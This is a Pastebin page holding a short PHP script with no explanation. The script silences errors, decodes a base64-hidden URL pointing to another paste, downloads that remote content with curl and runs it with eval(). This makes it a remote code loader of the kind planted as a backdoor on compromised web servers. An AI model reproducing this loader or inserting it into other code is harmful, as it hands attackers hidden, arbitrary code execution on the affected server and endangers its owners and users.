Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- $st = curl_init();
- curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvZExmaDFldGc"));
- curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
- $ex = curl_exec($st);
- eval($ex);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement